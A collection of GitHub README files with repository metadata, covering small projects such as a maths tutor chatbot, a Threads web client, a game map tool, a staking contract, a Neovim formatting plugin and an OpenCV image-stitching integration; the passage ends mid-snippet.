### Prerequisites

- Python 3.7+
- pip

### Setup

1. Clone the repository:

```sh
git clone https://github.com/moreshk/alzebra.git
cd alzebra
```

2. Install the necessary dependencies:

```sh
pip install -r requirements.txt
```

3. Run the application:

```sh
python server.py
```

Then, open your web browser and navigate to `localhost:5000`.

## Usage

Start by inputting your message to Al Zebra in the provided text box. Al Zebra will then respond with a mathematical problem. Enter your answer in the text box and Al Zebra will validate it, providing a step-by-step explanation if the answer is incorrect.

## Tech Stack

- Flask: Web server
- OpenAI: AI model
- LangChain: Library for chaining different language models
- Bootstrap: Front-end component library

## Contributing

Contributions are welcome! Please read the [CONTRIBUTING.md](CONTRIBUTING.md) for details on how to contribute.

## License

This project is licensed under the MIT License - see the [LICENSE.md](LICENSE.md) file for details
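To give a feel for the request/response loop the Usage and Tech Stack sections describe, here is a minimal Flask sketch. This is not the project's actual server.py; the `/chat` endpoint, payload shape, and system prompt are hypothetical, and it assumes the `openai` v1 client with `OPENAI_API_KEY` set.

```python
from flask import Flask, request, jsonify
from openai import OpenAI  # assumes OPENAI_API_KEY is set in the environment

app = Flask(__name__)
client = OpenAI()

SYSTEM_PROMPT = (
    "You are a friendly maths tutor for kids. Pose one problem at a time, "
    "check the child's answer, and explain the solution step by step when it is wrong."
)

@app.route("/chat", methods=["POST"])  # hypothetical endpoint, not necessarily the app's real one
def chat():
    user_message = request.json.get("message", "")
    completion = client.chat.completions.create(
        model="gpt-3.5-turbo",
        messages=[
            {"role": "system", "content": SYSTEM_PROMPT},
            {"role": "user", "content": user_message},
        ],
    )
    return jsonify({"reply": completion.choices[0].message.content})

if __name__ == "__main__":
    app.run(port=5000)
```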
62
6
yakovexplorer/ChimeraWebsite
https://github.com/yakovexplorer/ChimeraWebsite
Our API website. DM me in discord if you want to contribute.
This is a [Next.js](https://nextjs.org/) project bootstrapped with [`create-next-app`](https://github.com/vercel/next.js/tree/canary/packages/create-next-app).

## Getting Started

First, run the development server:

```bash
npm run dev
# or
yarn dev
# or
pnpm dev

# To build
npm run build && npm run start -p {port}
```

Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.

You can start editing the page by modifying `app/page.tsx`. The page auto-updates as you edit the file.

This project uses [`next/font`](https://nextjs.org/docs/basic-features/font-optimization) to automatically optimize and load Inter, a custom Google Font.

## Learn More

To learn more about Next.js, take a look at the following resources:

- [Next.js Documentation](https://nextjs.org/docs) - learn about Next.js features and API.
- [Learn Next.js](https://nextjs.org/learn) - an interactive Next.js tutorial.

You can check out [the Next.js GitHub repository](https://github.com/vercel/next.js/) - your feedback and contributions are welcome!

## Deploy on Vercel

The easiest way to deploy your Next.js app is to use the [Vercel Platform](https://vercel.com/new?utm_medium=default-template&filter=next.js&utm_source=create-next-app&utm_campaign=create-next-app-readme) from the creators of Next.js.

Check out our [Next.js deployment documentation](https://nextjs.org/docs/deployment) for more details.
17
13
feisuanyz/Automated-Testing-Platform
https://github.com/feisuanyz/Automated-Testing-Platform
Easy to Test and Maintain | Minimal Resource Consumption
Automated Testing Platform (ATP) ----------------------------------- Language: [English](https://github.com/feisuanyz/Automated-Testing-Platform/blob/main/README.md) | [中文](https://github.com/feisuanyz/Automated-Testing-Platform/blob/main/READMEcn.md) Client Download: [For Windows & Linux](https://main.feisuanyz.com:8080/atp/feisuanyz-local-client.zip) Installation Environment: | Category | Requirement | |----------|----------------| | Operating System | Windows 7 and above (64-bit) or Linux | | CPU | i5 or above (recommended) | | RAM | 16 GB or above (recommended) | | Disk | 1 GB or above | For previous client versions and installation instructions, please refer to [ATP Installation Resource](https://github.com/feisuanyz/Automated-Testing-Platform/tree/main/.%20ATP%20Installation%20Resource). =============================================== Automated Testing Platform (a.k.a. ATP) covers the entire software testing lifecycle, including test case management, test plan management, interface testing, performance testing, and more. It is fully compatible with JMeter and can associate and synchronize projects and interface information from the Java Automated Development Tool with a single click. Highly automated testing empowers teams to deliver high-quality software and improves overall testing efficiency. ### Client Deployment Instructions Automated Testing Platform provides a local client, allowing users to run the platform on their own servers. After downloading and successfully launching the local client, users can access ATP through their local servers. The ATP local client also supports multiple logins: users can log in simultaneously on multiple browser pages without separate configurations. #### 1. Prerequisites Users should have a Java environment installed on their Linux or Windows systems. #### 2. Steps a) Enter the extracted folder and double-click startup.bat to launch the local client. ![image](https://github.com/feisuanyz/testplatform/assets/79617492/0e20dd13-fa2d-4208-9899-c7a20f539724) b) If the program appears as shown in the image, the local client has been launched successfully. ![image](https://github.com/feisuanyz/testplatform/assets/79617492/0ba777a1-89b6-4ea5-99d1-7a59892984ac) c) Enter the local server address followed by the port number in your browser and press Enter to reach the login page. Note: c1) Make sure the chosen port number is unoccupied; it defaults to 8080. If you need to change the port number, edit the application.yml file, whose content is shown below. c2) To run performance tests with the ATP local client, you must fill in a host address indicating where the ATP local client is deployed. ``` server: port: 8080 atp: platform: # Deployment machine address, such as 172.16.101.35, do not configure localhost or 127.0.0.1 host: 172.16.101.35 ``` ![image](https://github.com/feisuanyz/testplatform/assets/79617492/0f44d375-0870-43f0-a62c-886c412ceaad) d) Enter the correct account and password to log in and access Automated Testing Platform. Note: d1) The account and password for accessing Automated Testing Platform via the local client are the same as those used on the feisuan official website. d2) Alternatively, you can open a new browser page and log in to the local client with a different account. In this case, multiple accounts can be logged in simultaneously without interference. ![image](https://github.com/feisuanyz/testplatform/assets/79617492/4b669f82-2ab3-48c4-b812-4bc426b771e9)
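Note c1 above asks you to make sure the chosen port is unoccupied before setting it in application.yml. A quick, general-purpose way to check (this snippet is not part of ATP itself) is to try binding the port locally:

```python
# Quick check that a port (default 8080) is free before assigning it in application.yml.
import socket
import sys

port = int(sys.argv[1]) if len(sys.argv) > 1 else 8080
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    try:
        s.bind(("", port))  # binding succeeds only if nothing is already listening here
        print(f"Port {port} is free")
    except OSError:
        print(f"Port {port} is already in use - pick another one")
```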
11
0
jayesh15/NewsNLP
https://github.com/jayesh15/NewsNLP
Natural Language Processing (NLP) project designed to analyze and extract valuable insights from news articles. Powered by advanced language models and cutting-edge NLP techniques, it offers a comprehensive solution for automated text analysis in the realm of news.
# NewsNLP Natural Language Processing (NLP) project designed to analyze and extract valuable insights from news articles. Powered by advanced language models and cutting-edge NLP techniques, it offers a comprehensive solution for automated text analysis in the realm of news.
19
1
stevenlafl/threads-web-client
https://github.com/stevenlafl/threads-web-client
A web client for Meta's new Threads app
# Instagram Threads Web Client <div align="center"> [![Docker Pulls](https://badgen.net/docker/pulls/stevenlafl/threads-web-client?icon=docker&label=pulls)](https://hub.docker.com/r/stevenlafl/threads-web-client/) [![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/stevenlafl/threads-web-client.svg)](http://isitmaintained.com/project/stevenlafl/threads-web-client "Average time to resolve an issue") </div> This project provides a desktop web client for Threads. Meta is too slow to implement, so I'm working on it. Mobile is not the best experience to work with. ##### DISCLAIMER: This software is made without any support from Meta and is in no way related to the company or any of its developers. This client makes the experience similar to Twitter but it is much different in implementation (original is in bootstrap while this one uses Tailwind, with different iconography). Use of the GPLv3 license is a notice of intent that there be no financial reward for an end-resulting usage or implementation of this software - it is simply a hobby project, though personal donations to its contributors are welcome. ##### NOTICE: Instagram's Threads API is undocumented so we cannot guarantee that you will not be suspended using this client. <br/> Please see [LICENSE](https://github.com/stevenlafl/threads-web-client/blob/master/LICENSE) for a notice of non-warranty and non-liability. ## Running ``` docker run -it -p 3000:3000 stevenlafl/threads-web-client:latest ``` Open [http://localhost:3000](http://localhost:3000) with your browser to see the result. Now you are presented with a login screen. This login screen **only exchanges a username/password combination for a token** and stores it on your browser in localStorage along with the application state. Subsequent requests use that localStorage's token value to do everything. This has no backend storage, so any browser session will work perfectly fine. I run the one instance and have multiple people accessing it for their feeds. You'll be presented a page like this: <img src="https://github.com/stevenlafl/threads-web-client/assets/2539092/864eaa01-f722-49fd-8d0d-bdfcbfddac16" width="400"/> Enter your credentials. Then you will have access to the client. Here are some screenshots (click to view larger version): <img src="https://github.com/stevenlafl/threads-web-client/assets/2539092/c3d974b8-757c-41b9-82fa-02de50fc35ec" width="400" /> <img src="https://github.com/stevenlafl/threads-web-client/assets/2539092/6584558d-ab7f-45a7-be2c-ae44f3ab9537" width="400" /> <img src="https://github.com/stevenlafl/threads-web-client/assets/2539092/02929168-dca2-4d38-903f-9a41cd94dc86" width="400" /> <img src="https://github.com/stevenlafl/threads-web-client/assets/2539092/9e1dc7aa-0a55-495b-a0a6-e3f2e526b492" width="400" /> ## Contributing First, run the development server: ```bash npm run dev # or yarn dev # or pnpm dev ``` Then it's the same steps as above, minus the docker portion. Everything should behave like a standard NextJS project. ## Roadmap Right now this just displays the regular feed with likes and reply counts. It displays images and it displays video properly. Todo: 1. ~~View threads~~ 2. ~~View replies~~ 3. ~~Add posting~~ 4. ~~Add replying~~ 5. ~~View images~~ 6. ~~View videos~~ 7. ~~View quotes~~ 5. ~~View repost~~ 6. ~~Add liking~~ 7. ~~Add reposting~~ 8. Add quote posting 9. Add account switching 10. ~~Follow/unfollow~~ 11. ~~Mute/Unmute~~ 12. ~~Block/unblock~~ 13. ~~Emoji picker~~ 14. ~~User search~~ 15. 
~~Recommended users sidebar~~ 16. Optimized/pretty post formatting 17. Character limiter on text entry for posting 18. ??? ### Credits Uses [NextJS](https://github.com/vercel/next.js/) and [threads.js](https://github.com/threadsjs/threads.js) at the core For the frontend tailwind work, this great UI by @hiravesonali https://tailwindcomponents.com/component/twitter-clone
32
10
fffam/blackdesert-somethinglovely-map
https://github.com/fffam/blackdesert-somethinglovely-map
Famme's BDO Tools - somethinglovely.net
# Famme's BDO Tools ### somethinglovely.net by Famme (Discord: fffam) An interactive map for Black Desert Online. The website has been sunset as a result of not being in a position to stay current with game updates. Horses, crates & tradepack tools are just embeds for the following jsfiddle pages: * **Horse Calculator:** https://jsfiddle.net/fffam/k5z99cus/embedded/result/ * **Crate Calculator:** https://jsfiddle.net/fffam/8Ldoz5wz/embedded/result/ * **Tradepack Reference:** https://jsfiddle.net/fffam/pL6us4kd/embedded/result/ All code & original assets are to be considered MIT-licensed (images within `horses` & `icons` are copyright Pearl Abyss Corp). You may use any of the code, or rehost the website in its entirety. <hr> ## Installation * Download the map tiles https://mega.nz/file/ThJA3BRD#KD-6R8Lm8d9MRZsl21BSe2HMrlpi72B9iMIKcRsoTs8 (100MB) * Host map tiles somewhere. * Clone repo * `npm install` * Search project for somethinglovely.net and replace with your own path to where your map tiles are being served from * If serving to the public, put it behind a cache (CloudFlare free tier works fine). To run locally: * `gulp` To build (into dist folder): * `gulp build` ## Updating data The data is all in [data.json](src/data.json). Nodes are listed in custom object format, all other layers are in standard GeoJSON FeatureCollection format. Should all be pretty obvious once prettified. ## Updating map tiles https://mega.nz/file/7t5yBTpb#kG8wK4gp6JKZf4W-qreqPQ8l9m0RdaowxDHBLk0rV8o (3.9GB) and https://mega.nz/file/b4pz3CBD#Fr9EWgL77kpCe2Iteai0lZhuS36YTJKaUt1NLw5f0BI (58KB). #### Time estimates: * 5 mins work * 1 hour wait to extract tiles * 10 mins work (more if you need to install WSL/bash) * 6 hour wait to convert to giant singular map png * 30 mins to combine in photoshop * 2 hour to split into leaflet tiles #### Steps: 1. Download latest PAZ files (i.e. just patch game) 2. Get paz_browser from BDO Data/PazExtractor and put it in BDO paz folder 3. Run it and Search > mapdata_realexplore then extract mapdata_realexplore.xml and mapdata_realexplore2.xml 4. Run it and extract `rader*.dds` (search `rader*.dds`, then press A to select all) 5. Wait for extraction to finish (ETA: 60 minutes, set an alert) 6. Put all of the dds map tiles into a folder called 'rader' 7. Copy the 5 radar script files (radar-combine.sh, radar-combine-fast.sh, radar-convert.sh, radar-getbounds.js and radar-sort.js) into the folder above 'rader' 8. In linux (probably WSL - https://docs.microsoft.com/en-us/windows/wsl/install-win10), make sure imagemagick is installed (sudo apt-get update followed by sudo apt-get install imagemagick) 9. Increase the width/height/disk/memory limits in the ImageMagick policy.xml (probably in /etc/ImageMagick-6/). Change width/height from 16KP to 256KP. Change Memory from 256MiB to 16GiB. Change Disk to 16GiB. 10. Create the empty folders alongside rader: * rader-sorted * rader-slices 11. Put the blank.png in the same folder as radar-sort.sh 12. In bash, run the scripts in the following order (or chain execute them with &&): `radar-convert.sh` (converts the dds texture files to png. ETA: 20m) `radar-sort.sh` (copies the png tiles to a folder with new names that are 0-indexed.) ETA: 30m) `radar-combine-fast.sh` (uses imagemagick's montage to stitch the tiles together. 
ETA: 4 hours, run it overnight) **NOTES:** radar-getbounds.js is just to check the map grid bounds radar-combine-fast.sh is slow, but it's just faster than the other version because it combines the tiles in strips as an intermediate step 13. Open Map (Combined).psb in Photoshop 14. With the `map_{DATE}` layer selected, go Layer > Smart Objects > Relink to File and select the new map.png that was created from step 11. The original linked image path will probably be broken by default. 15. Adjust the layer mask for the `map` layer, and for the Ocean Overlay layer to make the map look good. Then save the file (Ctrl-S), then also export the file as a 100% JPEG (File > Save a Copy... > Select JPEG) and save as map.jpg 16. Run the slicer script to convert to leaflet map tiles: `./magick-slicer.sh map.jpg` 17. [OPTIONAL BUT ADVISED] Once sliced, optimise the filesizes of the tiles (using ImageOptim on OSX or an equivalent tool on Linux/Win) `find ./Map_files -type f -iname \*jpg -print0 | xargs -0 -t -n 100 /Applications/ImageOptim\ 2.app/Contents/MacOS/ImageOptim` 18. Compress the files into a tarball `mv ./Map_files tiles-new` `tar -zcvf tiles-new.tar.gz tiles-new` 19. Upload the tarball to the server, then ssh into the server and unpack it `scp tiles-new.tar.gz [email protected]:/home/www/somethinglovely.net/bdo` `tar xzvf tiles-new.tar.gz` 20. Swap the old tiles for the new ones `mv tiles2 tiles2-old && mv tiles-new tiles2`
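For readers who prefer not to use ImageMagick, the tile-slicing step (step 16) can also be sketched in Python with Pillow. This is only an illustration of the general z/x/y tiling idea, not a drop-in replacement for `magick-slicer.sh`, whose exact tile naming and zoom-level handling may differ; the maximum zoom level below is an assumed value.

```python
# Illustrative z/x/y tile slicer using Pillow (assumed dependency: pip install Pillow).
import os
from PIL import Image

Image.MAX_IMAGE_PIXELS = None  # the combined map is far beyond Pillow's default size limit

TILE = 256
src = Image.open("map.jpg")
max_zoom = 7  # assumed maximum zoom level; adjust to match the real slicer output

for z in range(max_zoom + 1):
    scale = 2 ** (max_zoom - z)
    level = src.resize((src.width // scale, src.height // scale))
    for x in range(0, level.width, TILE):
        for y in range(0, level.height, TILE):
            tile = level.crop((x, y, x + TILE, y + TILE))  # edge tiles are padded
            out_dir = os.path.join("Map_files", str(z), str(x // TILE))
            os.makedirs(out_dir, exist_ok=True)
            tile.save(os.path.join(out_dir, f"{y // TILE}.jpg"), quality=85)
```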
34
25
verytinydever/stakingContract
https://github.com/verytinydever/stakingContract
null
# Basic Sample Hardhat Project Users stake different quantities of an ERC-20 token named "TKN". Assume that an external caller periodically transfers reward TKN to the staking smart contract (no need to implement this logic). Rewards are distributed proportionally to the staked TKN. A contract caller can: - Stake - Unstake (being able to unstake only part of a stake would be a plus) - See how many tokens each user can unstake ## Contract philosophy A separate token was created so that the staking contract can work with both existing and not-yet-existing tokens. Only the owner can distribute rewards, but everyone can deposit any amount of tokens and eventually withdraw their funds, so there is no whitelisting mechanism here. ##### **stake**(uint `amount`) A user can deposit tokens, but this requires an **approve** call on the token contract itself. Simply put, you need to approve the specific amount of tokens you are going to stake for the staking contract address. *NOTE*: You can't pass a zero amount and you can't stake more than once. If you want to deposit a different amount, you need to unstake all funds first; then you can stake any value you would like. ##### **distribute**(uint `reward`) The contract owner can distribute a reward proportionally to all active stakers. *NOTE*: For this to happen, the owner needs to **approve** the amount of tokens they are going to distribute for the staking contract address. Also, the owner can't distribute anything if there are no active stake holders. ##### **unstake**() A stake holder can withdraw all of their funds by calling this function. *NOTE*: If you are not a stake holder the call will be reverted; likewise, if you have no active stake you can't withdraw anything. ##### **getAllStakers**() Outputs every stake holder together with their deposit. #### Get started To run tests just go: ```shell npm test ``` To deploy contracts to a local network run: ```sh SUPPLY=200 npm start ``` By default the supply equals `1 000 000` ### Next enhancements * unstake a part of the stake for each user * proxy implementation * set up deployment for a wide range of networks
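To make the proportional-distribution rule described above concrete, here is a small Python model of the accounting. It is a sketch of the logic only, not the Solidity contract itself.

```python
# Toy model of the staking contract's reward accounting (illustrative only).
class StakingModel:
    def __init__(self):
        self.stakes = {}  # address -> staked TKN (plus accrued rewards)

    def stake(self, user, amount):
        assert amount > 0, "zero amount is rejected"
        assert user not in self.stakes, "only one active stake per user"
        self.stakes[user] = amount

    def distribute(self, reward):
        total = sum(self.stakes.values())
        assert total > 0, "no active stakers"
        for user, staked in self.stakes.items():
            # each staker's share is proportional to their part of the total stake
            self.stakes[user] = staked + reward * staked / total

    def unstake(self, user):
        return self.stakes.pop(user)  # withdraws the full balance, as in the contract


model = StakingModel()
model.stake("alice", 100)
model.stake("bob", 300)
model.distribute(40)            # alice's share is 10, bob's share is 30
print(model.unstake("alice"))   # 110.0
print(model.unstake("bob"))     # 330.0
```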
15
0
elentok/format-on-save.nvim
https://github.com/elentok/format-on-save.nvim
Automatically formats files when saving using either LSP or shell utilities like prettierd or shfmt
# format-on-save.nvim Automatically formats files when saving using either LSP or shell utilities like prettierd or shfmt. It also restores the cursor of any window showing the current file (useful when editing the same file in a split). NOTE: This is a work in progress and the API might change. ## Why another formatting plugin? Until now I've used LSP-only formatting with a simple auto command with null-ls to cover non-LSP formatters. However, now that null-ls is being archived I needed to find an alternative. I tried several plugins but: - Neither supported both LSP and non-LSP formatters - Some of them format asynchronously which is tricky because you need to lock the buffer before formatting and there are a lot of end cases. - Some of them support partial formatting which adds a lot of complexity. This plugin has a few core principles to keep it simple: - **Synchronous formatting** - Most of the formatters I use are quite fast and the delay isn't noticeable to me. - **Format on save only** (no partial formatting) - There's a `:Format` command you can call whenever you want but the purpose of this plugin is to format when saving. ## TODO - [x] Add LazyFormatter - a function that is only called while formatting and returns a formatter - [x] Add CustomFormatter - a function that gets an array of lines and returns a new array of lines - [x] Support concatenating formatters - [ ] File size limit / Line count limit - to avoid hanging on files that are too big (add a :ForceFormat command and notify the user why formatting was skipped) - [x] Use vim.notify to show error messages - [x] Support formatters that don't work with stdin by writing to a temp file first - [ ] Add LSP timeout to configuration - [ ] Shell formatter - when the result is the same as the input don't modify the buffer - [ ] When non-LSP formatter fails (non-zero exitcode) show the error in a nicer way (readonly message buffer, notification or popup). - [ ] Look into using vim.diff() to make the partial update smarter (only update lines that actually changed) ## Formatters There are currently 3 types of formatters: - **LspFormatter** - uses `vim.lsp.buf.format` to format the file, you can pass a `client_name` option to use a specific client in case there are several ones that support formatting. - **ShellFormatter** - passes the current buffer via stdin to a shell program (like `prettierd` or `shfmt`) and replaces the buffer's contents with the result. - For formatters that don't support stdin you can pass a `tempfile` field which can be either `"random"` (uses `vim.fn.tempname()`) or a function that returns a string to be used as the tempfile and then the plugin will write the buffer to this file, run the command on it (the "%" value will be expanded to the tempfile) and read it back and fill in the buffer). - The first item in the `cmd` array will be expanded by default using the `vim.fn.exepath` function in order to detect mason binaries. To opt-out set the `expand_executable` field to `false`. - **CustomFormatter** - passes the lines of the current buffer through a function that modifies them and then updates the contents. - **LazyFormatter** - a function that is called lazily every time we format the file, this allows using a different formatter for different files. ## Partial update When updating all of the lines in a buffer all of the extmarks get removed. 
In an attempt to avoid that I added an experimental flag `partial_update` that only updates lines that have changed (it's currently using a very simple algorithm, compares each line by index, no advance diffing, I might look into that in the future). You can enable it like this: ```lua require('format-on-save').setup({ partial_update = true, }) ``` ## Installation Add the following to your package manager: ```lua { "elentok/format-on-save.nvim" }, ``` ## Configuration By default this plugin doesn't enable any format on save, you have to specify what you want: ```lua local format_on_save = require("format-on-save") local formatters = require("format-on-save.formatters") format_on_save.setup({ exclude_path_patterns = { "/node_modules/", ".local/share/nvim/lazy", }, formatter_by_ft = { css = formatters.lsp, html = formatters.lsp, java = formatters.lsp, javascript = formatters.lsp, json = formatters.lsp, lua = formatters.lsp, markdown = formatters.prettierd, openscad = formatters.lsp, python = formatters.black, rust = formatters.lsp, scad = formatters.lsp, scss = formatters.lsp, sh = formatters.shfmt, terraform = formatters.lsp, typescript = formatters.prettierd, typescriptreact = formatters.prettierd, yaml = formatters.lsp, -- Add your own shell formatters: myfiletype = formatters.shell({ cmd = { "myformatter", "%" } }), -- Add lazy formatter that will only run when formatting: my_custom_formatter = function() if vim.api.nvim_buf_get_name(0):match("/README.md$") then return formatters.prettierd else return formatters.lsp() end end, -- Add custom formatter filetype1 = formatters.remove_trailing_whitespace, filetype2 = formatters.custom({ format = function(lines) return vim.tbl_map(function(line) return line:gsub("true", "false") end, lines) end}), -- Concatenate formatters python = { formatters.remove_trailing_whitespace, formatters.shell({ cmd = "tidy-imports" }), formatters.black, }, -- Use a tempfile instead of stdin go = { formatters.shell({ cmd = { "goimports-reviser", "-rm-unused", "-set-alias", "-format", "%" }, tempfile = function() return vim.fn.expand("%") .. '.formatter-temp' end }), formatters.shell({ cmd = { "gofmt" } }), }, }, -- Optional: fallback formatter to use when no formatters match the current filetype fallback_formatter = { formatters.remove_trailing_whitespace, formatters.prettierd, } -- By default, all shell commands are prefixed with "sh -c" (see PR #3) -- To prevent that set `run_with_sh` to `false`. run_with_sh = false, }) ``` ### Error messages By default the plugin uses `vim.notify()` to show error messages, you can customize it by setting the `error_notifier` configuration flag: ```lua local format_on_save = require("format-on-save") local message_buffer = require("format-on-save.error-notifiers.message-buffer") format_on_save.setup({ error_notifier = message_buffer, }) ``` Alternatively you can implement your own: ```lua local format_on_save = require("format-on-save") ---@type ErrorNotifier local error_notifier = { show = function(opts) -- use opts.title and opts.body end, hide = function() -- hide the error when it's been resolved end, } format_on_save.setup({ error_notifier = error_notifier, }) ``` ### Disable warning when formatter is successful but wrote to stderr When a formatter exits with exitcode 0 but its stderr has contents we show a warning message (via `vim.notify`). The default level is `vim.log.levels.WARN`. 
To disable this message entirely set the `stderr_loglevel` config key to `vim.log.levels.OFF`: ```lua require('format-on-save').setup({ stderr_loglevel = vim.log.levels.OFF, }) ``` ### Disable auto commands and user commands By default it will add the `BufWritePre` and `BufWritePost` autocommands and the `Format`, `FormatOn` and `FormatOff` user commands. If you prefer to avoid it and define your own you can disable it: ```lua require('format-on-save').setup({ auto_commands = false, user_commands = false, }) ``` To trigger the format call: ```lua require('format-on-save').format() ``` To restore the cursor positions after the format: ```lua require('format-on-save').restore_cursors() ```
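As a language-agnostic illustration of the `partial_update` idea described earlier (compare lines by index and only touch the ones that changed), here is a short Python sketch; the plugin itself implements this in Lua, and its exact behaviour may differ.

```python
# Sketch of the index-by-index partial update: return (index, new_line) pairs to apply.
def changed_lines(old_lines, new_lines):
    updates = []
    for i in range(max(len(old_lines), len(new_lines))):
        old = old_lines[i] if i < len(old_lines) else None
        new = new_lines[i] if i < len(new_lines) else None
        if old != new:
            updates.append((i, new))  # new is None when the line should be deleted
    return updates


before = ["local x = 1", "print( x )", "return x"]
after = ["local x = 1", "print(x)", "return x"]
print(changed_lines(before, after))  # [(1, 'print(x)')]
```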
52
1
rya0x/mempool-geth-vs-reth
https://github.com/rya0x/mempool-geth-vs-reth
null
``` ./mempool-geth-vs-reth --help ``` yellow = geth win\ red = reth win ![Screenshot 2023-07-12 at 18 07 01](https://github.com/rya0x/mempool-geth-vs-reth/assets/83345377/5be5477d-98a8-468e-9af2-e8d55a3b217d)
28
0
verytinydever/simpleBlockchainPrototype
https://github.com/verytinydever/simpleBlockchainPrototype
null
# simpleBlockchainPrototype 1. Install Node.js version 9+ and npm version 2+ 2. Run in a console: "git clone https://github.com/edrygka/simpleBlockchainPrototype" 3. Then run "npm install" in that directory 4. And run "npm start" A "mydb" directory (a LevelDB database) will be created in your directory, along with genesis logic that generates a key pair and gives you a coin. There are 2 keys in the db: 'accounts', which holds an array of all account info, and 'transactions', which holds an array of all transactions that were created. *To generate a new key pair, run in a terminal: curl http://localhost:3000/createAccount * *To create a new transaction: http://localhost:3001/createTX and input your public and private keys*
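The same two endpoints can also be called from Python instead of curl. The sketch below uses the `requests` library and the URLs (including their ports) exactly as listed above; the parameter names for the public and private keys are not documented here, so they are placeholders/assumptions.

```python
# Calling the prototype's HTTP endpoints (assumed dependency: pip install requests).
import requests

# Generate a new key pair (URL as given above).
resp = requests.get("http://localhost:3000/createAccount")
print(resp.text)

# Create a new transaction (URL as given above). The parameter names used here
# for the public/private keys are assumptions, not taken from the project docs.
tx = requests.get(
    "http://localhost:3001/createTX",
    params={"publicKey": "<your public key>", "privateKey": "<your private key>"},
)
print(tx.text)
```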
15
0
AIDajiangtang/Superpoint-LightGlue-Image-Stiching
https://github.com/AIDajiangtang/Superpoint-LightGlue-Image-Stiching
Integrate SuperPoint and LightGlue into OpenCV image stitching or Matching algorithm
Simplified Chinese | [English](README_EN.md) # DeepLearning-based-Feature-extraction-and-matching Integrate the deep-learning pretrained models SuperPoint and LightGlue into OpenCV's stitching algorithm. ## OpenCV stitching pipeline Image feature extraction and matching are the foundation of many higher-level computer vision tasks, such as image registration, image stitching, camera calibration, SLAM, depth estimation, and so on. Here we take image stitching as the entry point to see how important feature extraction and matching are. OpenCV provides the highly encapsulated Stitcher class; image stitching can be done with just a few lines of code. Mat pano; Ptr<Stitcher> stitcher = Stitcher::create(mode); Stitcher::Status status = stitcher->stitch(imgs, pano); But the stitching process as a whole is quite complex. In words, the main stages of the stitching algorithm are: feature extraction -> feature matching -> camera parameter estimation -> blended image generation. Feature extraction matters most: the quality of the keypoints and feature descriptors determines the final stitching result. OpenCV currently provides feature extractors such as SIFT, SURF, and ORB. OpenCV currently provides feature matchers such as Brute-Force, FLANN, and KNN. The selected feature extraction and matching algorithms are then set into the stitching pipeline with the following code. if (feature_type == FeatureType::SURF) stitcher->setFeaturesFinder(xfeatures2d::SURF::create()); else if (feature_type == FeatureType::SIFT) stitcher->setFeaturesFinder(SIFT::create()); else stitcher->setFeaturesFinder(ORB::create()); stitcher->setFeaturesMatcher(makePtr<detail::BestOf2NearestMatcher>( false)); stitcher->setFeaturesMatcher(makePtr<detail::BestOf2NearestRangeMatcher>( false)); stitcher->setFeaturesMatcher(makePtr<detail::AffineBestOf2NearestMatcher>(true, false)); This is thanks to C++ object-oriented programming: inheritance and polymorphism make it possible to extend the pipeline with different feature extraction and matching algorithms. ## Deep-learning feature detection and matching Now the main characters enter the stage: we add a deep-learning feature extraction algorithm, SuperPoint, and a deep-learning feature matching algorithm, LightGlue, to OpenCV. SuperPoint: [[`Paper`](https://arxiv.org/pdf/1712.07629.pdf)] [[`Source`](https://github.com/rpautrat/SuperPoint)] LightGlue: [[`Paper`](https://arxiv.org/pdf/2306.13643.pdf)] [[`Source`](https://github.com/cvg/LightGlue)] Following OpenCV's class hierarchy, the base class for feature extraction is Feature2D and the base class for feature matching is FeaturesMatcher. We derive two new classes from these bases, SuperPoint and LightGlue, and re-implement the base classes' virtual methods. [superpoint](superpoint.cpp) [lightglue](lightglue.cpp) ## How to build Currently only tested on Windows 11 with Visual Studio 2019 and CMake 3.26.4. 1. Reply "sl" to the WeChat official account to get the pretrained models; the model paths are passed to the program as arguments. WeChat official account: **人工智能大讲堂** <img width="180" src="https://user-images.githubusercontent.com/18625471/228743333-77abe467-2385-476d-86a2-e232c6482291.jpg"> Reply "sl" to the account to get the pretrained models above and the third-party dependencies. 2. Reply "sl" to the WeChat official account to get the third-party libraries OpenCV and ONNXRuntime, then extract them into the source directory. OpenCV was built by me with Visual Studio 2019; ONNXRuntime does not need to be built yourself, just download the prebuilt package from the official website. The final project structure is as follows: project_root/ |- common.h |- superpoint.h |- superpoint.cpp |- lightglue.h |- lightglue.cpp |- cppDemo.cpp |- opencv/ |- onnxruntime-win-x64-1.15.1/ |- CMakeLists.txt 3. Open CMake, enter the source path and the build output path, then click Configure -> Generate -> Open Project in turn. ## Integrating into OpenCV Then set the newly added classes into the stitching pipeline. [CPPDemo](cppDemo.cpp) Mat pano; Ptr<Stitcher> stitcher = Stitcher::create(mode); Ptr<SuperPoint> superpointp = makePtr<SuperPoint>(sp); Ptr<LightGlue> lightglue = makePtr<LightGlue>(lh, mode); stitcher->setPanoConfidenceThresh(0.1f); stitcher->setFeaturesFinder(superpointp);//SuperPoint feature extraction stitcher->setFeaturesMatcher(lightglue);//LightGlue feature matching Stitcher::Status status = stitcher->stitch(imgs, pano); 1. Put onnxruntime.dll and opencv_world455.dll (opencv_world455d.dll in debug mode) next to the exe. 2. Run cppDemo.exe and set the arguments, for example --mode panorama --lg D:\\superpoint_lightglue.onnx --sp D:\\superpoint.onnx D:\\1.jpg D:\2.jpg <img width="500" src="https://user-images.githubusercontent.com/18625471/256421932-94e8b07b-fc4b-4307-a94e-e7e735d620d8.jpg"> Stitching supports two transformation models, affine and perspective, selected with --mode (panorama|scans): panorama selects the perspective model, scans selects the affine model. --sp specifies the path to the SuperPoint ONNX model. --lg specifies the path to the LightGlue ONNX model. D:\\1.jpg D:\2.jpg are the input images to stitch. Stitching result <img width="500" src="https://user-images.githubusercontent.com/18625471/256420139-3c03fbcb-3047-44a5-9403-d98f86e222da.jpg"> Feature matching <img width="800" src="https://user-images.githubusercontent.com/18625471/256420458-c296cd92-ddbc-479d-a224-ba01a56450f5.jpg"> For those who are not familiar with C++, I also provide a C# demo. [CSharpDemo](csharpDemo.cs)
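For context, the stock OpenCV stitching pipeline that this project extends can also be driven from Python, without the SuperPoint/LightGlue classes, which in this repository are implemented in C++ only. The following is a minimal sketch using the standard `opencv-python` bindings with assumed input file names:

```python
# Baseline OpenCV stitching in Python (default features, no SuperPoint/LightGlue).
import cv2

imgs = [cv2.imread("1.jpg"), cv2.imread("2.jpg")]  # assumed input file names
stitcher = cv2.Stitcher_create(cv2.Stitcher_PANORAMA)  # or cv2.Stitcher_SCANS for affine
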